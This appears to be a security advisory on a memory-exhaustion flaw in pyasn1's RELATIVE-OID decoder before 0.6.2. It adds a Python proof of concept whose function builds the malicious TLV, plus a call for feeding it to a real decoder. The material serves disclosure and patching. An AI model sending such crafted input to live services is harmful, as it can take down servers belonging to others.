pyasn1 Denial-of-Service Vulnerability in RELATIVE-OID Decoder Prior to 0.6.2
Vulnerability
A denial-of-service vulnerability has been identified in the pyasn1 library in versions prior to 0.6.2. The issue lies in the BER OID decoder's handling of RELATIVE-OID values. Each sub-identifier of an OID is encoded base-128, seven bits per octet, with the high bit set on every octet except the last (the "continuation" octets); the vulnerable decoder places no bound on how many continuation octets it will accept and accumulate into a single sub-identifier. A malformed RELATIVE-OID built from an excessive run of continuation octets therefore makes the decoder consume memory in proportion to attacker-controlled input, which can exhaust memory and hang the application or service that performs the decode.
Impact
Exploitation of this vulnerability leads to memory exhaustion, causing the affected application or service to hang or stop responding. Any code path that hands attacker-supplied BER/DER to pyasn1 is exposed; the impact is greatest for services built on protocols that carry ASN.1 from untrusted peers, such as LDAP, TLS/SSL and OCSP.
Reproduction
The vulnerability can be reproduced with the pyasn1 BER decoder and a hand-crafted RELATIVE-OID whose single sub-identifier spans more than 20 continuation octets: build the TLV (tag 0x0D, a BER length, and a content field made of octets with the high bit set followed by one terminating octet with the high bit clear) and pass it to the decoder. A vulnerable version accepts the input and keeps accumulating the sub-identifier instead of rejecting it, so memory use grows with the size of the crafted input until the process is exhausted. Reproduce only in an isolated environment with a memory limit in place (for example `ulimit -v`), since a successful test is itself a denial of service.
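The following is an added, stand-alone illustration written for this page; it is not pyasn1's code. It implements a minimal BER RELATIVE-OID encoder and decoder so the mechanism is visible: `craft_malicious_relative_oid` builds the kind of input described above, `decode_relative_oid` with `max_continuation=None` reproduces the unbounded accumulation (the decoded integer grows by seven bits per continuation octet), and the default cap rejects the input instead. The function names, the helper structure and the cap of 20 (taken from the figure quoted above) are this example's own assumptions, as is the sample input.

```python
# Added illustration, not pyasn1's own code: a minimal BER RELATIVE-OID codec
# that shows how base-128 sub-identifiers accumulate, why an unbounded run of
# continuation octets is a resource-exhaustion vector, and a cap that stops it.
# Function names and the default cap of 20 are this example's assumptions.

RELATIVE_OID_TAG = 0x0D  # UNIVERSAL 13, primitive (X.680 / X.690)


def ber_length(n: int) -> bytes:
    """BER definite length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def encode_subid(n: int) -> bytes:
    """Base-128 encode one sub-identifier: 7 data bits per octet, bit 8 set
    on every octet except the last (X.690 8.19.2)."""
    if n < 0:
        raise ValueError("sub-identifier must be non-negative")
    octets = [n & 0x7F]
    n >>= 7
    while n:
        octets.append(0x80 | (n & 0x7F))
        n >>= 7
    return bytes(reversed(octets))


def encode_relative_oid(arcs) -> bytes:
    """Well-formed TLV for a RELATIVE-OID, e.g. (1, 2, 840) -> 0d 04 01 02 86 48."""
    content = b"".join(encode_subid(a) for a in arcs)
    return bytes([RELATIVE_OID_TAG]) + ber_length(len(content)) + content


def craft_malicious_relative_oid(continuation_octets: int) -> bytes:
    """Constructed attacker input: one sub-identifier made of 0x81, then
    continuation_octets-1 octets of 0x80, then a terminating 0x01.  The first
    octet is 0x81 rather than 0x80 so a leading-zero check (X.690 forbids a
    leading 0x80) does not reject it; only a cap on continuation octets will."""
    if continuation_octets < 1:
        raise ValueError("need at least one continuation octet")
    content = b"\x81" + b"\x80" * (continuation_octets - 1) + b"\x01"
    return bytes([RELATIVE_OID_TAG]) + ber_length(len(content)) + content


def decode_relative_oid(tlv: bytes, max_continuation=20) -> tuple:
    """Parse a RELATIVE-OID TLV into a tuple of arcs.

    max_continuation=None reproduces the unbounded behaviour: each continuation
    octet shifts the partial value left by 7 bits, so memory and time grow with
    the attacker-chosen length.  An integer cap raises ValueError instead."""
    if len(tlv) < 2 or tlv[0] != RELATIVE_OID_TAG:
        raise ValueError("not a RELATIVE-OID TLV")
    first = tlv[1]
    if first < 0x80:
        length, offset = first, 2
    elif first == 0x80:
        raise ValueError("indefinite length is invalid for a primitive type")
    else:
        nbytes = first & 0x7F
        length = int.from_bytes(tlv[2:2 + nbytes], "big")
        offset = 2 + nbytes
    content = tlv[offset:offset + length]
    if len(content) != length:
        raise ValueError("short substrate")
    if not content:
        raise ValueError("empty RELATIVE-OID")

    arcs, value, cont, in_subid = [], 0, 0, False
    for octet in content:
        if not in_subid and octet == 0x80:
            raise ValueError("leading 0x80 in sub-identifier (X.690 8.19.2)")
        in_subid = True
        value = (value << 7) | (octet & 0x7F)   # the unbounded accumulation
        if octet & 0x80:
            cont += 1
            if max_continuation is not None and cont > max_continuation:
                raise ValueError(
                    f"sub-identifier has more than {max_continuation} continuation octets")
        else:
            arcs.append(value)
            value, cont, in_subid = 0, 0, False
    if in_subid:
        raise ValueError("truncated sub-identifier")
    return tuple(arcs)


def decoded_bit_length(tlv: bytes) -> int:
    """Size of the first arc an unbounded decoder would build: 7 bits per
    continuation octet plus the terminator, i.e. linear in the input."""
    return decode_relative_oid(tlv, max_continuation=None)[0].bit_length()


if __name__ == "__main__":
    print(encode_relative_oid((1, 2, 840)).hex())
    bad = craft_malicious_relative_oid(100_000)
    print("unbounded decoder builds a", decoded_bit_length(bad), "bit integer")
    try:
        decode_relative_oid(bad)          # default cap of 20
    except ValueError as e:
        print("capped decoder:", e)
```

The same TLV from `craft_malicious_relative_oid` can be handed to a real pyasn1 install (`pyasn1.codec.ber.decoder.decode(tlv, asn1Spec=univ.RelativeOID())`) to check which behaviour a given version has; start with a small octet count and keep a memory limit on the process, because on an unpatched version a large count is the denial of service itself.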
Remediation
Users are advised to update to pyasn1 version 0.6.2 or later, where the decoder rejects a RELATIVE-OID whose sub-identifier exceeds the continuation-octet limit instead of attempting to decode it. pyasn1 is frequently pulled in as a transitive dependency (for example through pyasn1-modules), so check the version actually installed with `python -c "import pyasn1; print(pyasn1.__version__)"` rather than relying on a direct requirement, and pin `pyasn1>=0.6.2` in the project's dependency constraints.
